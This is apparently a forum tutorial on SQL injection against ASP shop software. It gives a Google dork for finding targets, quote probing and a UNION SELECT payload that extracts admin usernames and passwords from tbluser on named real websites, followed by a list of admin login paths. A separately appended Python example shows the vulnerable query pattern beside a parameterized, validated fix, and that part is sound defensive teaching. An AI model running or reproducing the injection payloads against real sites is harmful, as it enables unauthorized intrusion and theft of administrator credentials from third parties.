First, go to google.com and search for this:
inurl:/shopdisplayproducts.asp
OK, now we find a site with shopdisplayproducts.asp.
Let's look at one:
Code:
http://www.globalasp.org.uk/store/sh…ucts.asp?id=14
OK, now we put this sign at the end of the link: '
Now the link looks like this:
Code:
http://www.globalasp.org.uk/store/shopdisp….asp?id=14'
and we get an error:
products
microsoft jet database engine error ‘80040e14'
syntax error in string in query expression ‘cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and cc.intcategoryid = 14' and hide=0 order by specialoffer desc,cname’.
/store/shop$db.asp, line 467
If we see this error, then the site is hackable!
OK, now we remove the '
Code:
http://www.globalasp.org.uk/store/sh…ucts.asp?id=14
and add this to the end:
%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50%20from%20tbluser’
The link is now:
Code:
http://www.globalasp.org.uk/store/shopdisp…%20tbluser’
Put it in the browser and we get the same error!
OK, now look at these numbers:
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50
Now we remove ,50
and test again:
Code:
http://www.globalasp.org.uk/store/shopdisp…%20tbluser’
The same error. Now we keep removing numbers one at a time, and when we no longer see the error we should see the site. On this server the correct number for the
exploit is -> 47 <-
Code:
http://www.globalasp.org.uk/store/shopdisp…%20tbluser’
--> here you see 47 is the last number.
OK, now we put this in the browser and we don't see the error, we see some laptops.
OK, now we find the numbers 3 and 4 on that page.
They are small.
When we find those numbers, we replace 3 and 4 in the link with this:
fldusername,fldpassword
Now the exploitable link is this:
Code:
http://www.globalasp.org.uk/store/shopdisp…%20tbluser’
Look where the numbers 3 and 4 were: now there are the username and password for
logging in to shopadmin. Now we go to this link:
http://www.globalasp.org.uk/store/colours$config.asp
There is the login for shopadmin, and we log in!
These are paths where shopadmin can be too:
shopadmin.asp --> this, or … with 1
shopadmin1.asp --> this one in 90% of cases
adminindex.html
shopadmin1.asp
shopa_displayorders.asp?page=2
shopa_displayorders.asp
shopa.asp
displayorders.asp
admin.asp
orders.asp
vieworders.asp
view_orders.asp
Code:
http://www.publishamerica.com/shopping/
... 20tbluser'
Code:
http://msponline.net/shopping/shopadmin.asp
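The error shown above appears because the id value is pasted straight into the SQL text. The following is an added example, not code from the shop software or from this post: it uses Python's sqlite3 as a stand-in for the Jet database, with a constructed schema and data (only the table and column names are taken from the post and its error message), and puts the vulnerable query construction beside a validated, parameterized one that also keeps database errors off the page.

```python
import sqlite3

# Constructed sample data. sqlite3 stands in for the Jet/Access database;
# table and column names follow the post, the rows are made up.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (catalogid INTEGER, cname TEXT,
                               categoryid INTEGER, hide INTEGER);
        CREATE TABLE tbluser (fldusername TEXT, fldpassword TEXT);
        INSERT INTO products VALUES (1, 'Laptop A', 14, 0),
                                    (2, 'Laptop B', 14, 0), (3, 'Hidden', 14, 1);
        INSERT INTO tbluser VALUES ('admin', 'constructed-secret');
    """)
    return db

def list_products_vulnerable(db, raw_id):
    # The pattern behind the error on the page: the id parameter becomes
    # part of the SQL text, so a stray quote changes the statement itself.
    sql = ("SELECT catalogid, cname FROM products "
           "WHERE categoryid = " + raw_id + " AND hide = 0 ORDER BY cname")
    return db.execute(sql).fetchall()

def list_products_hardened(db, raw_id):
    # 1. Validate: a category id is a short run of ASCII digits, nothing else.
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 9):
        return 400, []
    try:
        # 2. Bind: the value travels separately from the SQL text.
        rows = db.execute(
            "SELECT catalogid, cname FROM products "
            "WHERE categoryid = ? AND hide = 0 ORDER BY cname",
            (int(raw_id),)).fetchall()
    except sqlite3.Error:
        # 3. Never echo driver errors (query text, file paths) to the client.
        return 500, []
    return 200, rows

if __name__ == "__main__":
    db = make_db()
    # Inputs of the kind the post sends: a plain id, a trailing quote, a UNION.
    for probe in ("14", "14'", "14 union select 1,2 from tbluser'"):
        try:
            vulnerable = list_products_vulnerable(db, probe)
        except sqlite3.Error as exc:
            vulnerable = "database error reaches the page: %s" % exc
        print(repr(probe), "->", vulnerable, "|", list_products_hardened(db, probe))
```

With the hardened function, the quote and the UNION suffix never reach the database, and the page has no verbose error to reveal the query or the script path.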